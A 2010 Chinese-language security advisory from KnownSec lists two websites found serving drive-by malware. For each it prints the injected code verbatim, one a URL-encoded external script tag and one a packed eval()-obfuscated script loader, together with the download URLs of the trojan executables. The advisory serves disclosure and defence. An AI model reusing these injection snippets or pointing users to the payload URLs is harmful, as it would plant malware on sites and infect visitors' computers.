发布时间:Wed Feb 3 2010 20:22:07 UTC+0800
最后更新时间:Wed Feb 3 2010 20:22:07 UTC+0800
________________________________________
知道创宇安全团队(KnownSec Team)今日监测到以下网站被植入恶意代码,用户访问以下挂马页面可能被安装木马病毒等恶意程序,导致敏感信息泄露甚至电脑被黑客控制。
网站名称:北京IT外包网
网站链接:http://www.topnet.bj.cn/
恶意代码:
<script language=javascript src=http://h%69r.x%6Frg.%70l/c.js?google_ad=01×1101_ad></script>
所在页面:http://www.topnet.bj.cn/
下载病毒:
http://abl.bij.pl/l/vv.exe
其他机构判定结果:
google:安全
网站名称:七星阁
网站链接:http://www.qixingge.com/
恶意代码:
document.writeln(”<script language=\”javascript\”>”);
document.writeln(”if(document.cookie.indexOf(\’hello\’)==-1){var expires=new Date();expires.setTime(expires.getTime()+24*60*60*1000);document.cookie=\’hello=Yes;path=\/;expires=\’+expires.toGMTString()”);
document.writeln(”eval(function(p,a,c,k,e,d){e=function(c){return(c<a?\’\':e(parseInt(c\/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!\’\’.replace(\/^\/,String)){while(c–)d[e(c)]=k[c]||e(c);k=[function(e){return d[e]}];e=function(){return\’\\\\w+\’};c=1};while(c–)if(k[c])p=p.replace(new RegExp(\’\\\\b\’+e(c)+\’\\\\b\’,\’g\’),k[c]);return p}(\’3.e(\”<b 9=7 c=5:\/\/6.a.2\/4\/d\/f\/1.8?0><\/b>\”);\’,62,16,\’APAHOD|ads|com|document|wap|http|club|javascript|jpg|language|9istyle|script|src|include|writeln|main\’.split(\’|\’),0,{}));}”);
document.writeln(”<\/script>”)
所在页面:http://www.qixingge.com/scripts/common.js
下载病毒:
http://club.9istyle.com/wap/include/lsass.exe
其他机构判定结果:
google:安全
知道安全提醒网民,要做好安全防护,避免因网络安全问题影响您正常的生活和工作。如果您发现网站被挂马,也可向国家互联网应急中心举报。 国家互联网应急中心:http://www.cert.org.cn/
推荐的应对方法:
1.安装客户端保护软件。
2.检查更新windows及第三方软件补丁程序。
如果您有技术方面的问题或者需要技术咨询可以通过以下方式联系我们:
邮箱:sec@knownsec.com或sec@scanw.com
知道创宇:专业的WEB安全公司 www.knownsec.com
我们很乐意他人使用我们的工作成果,如果使用我们数据的请通知我们一下,我们将十分感谢。
Popularity: 10% [?]
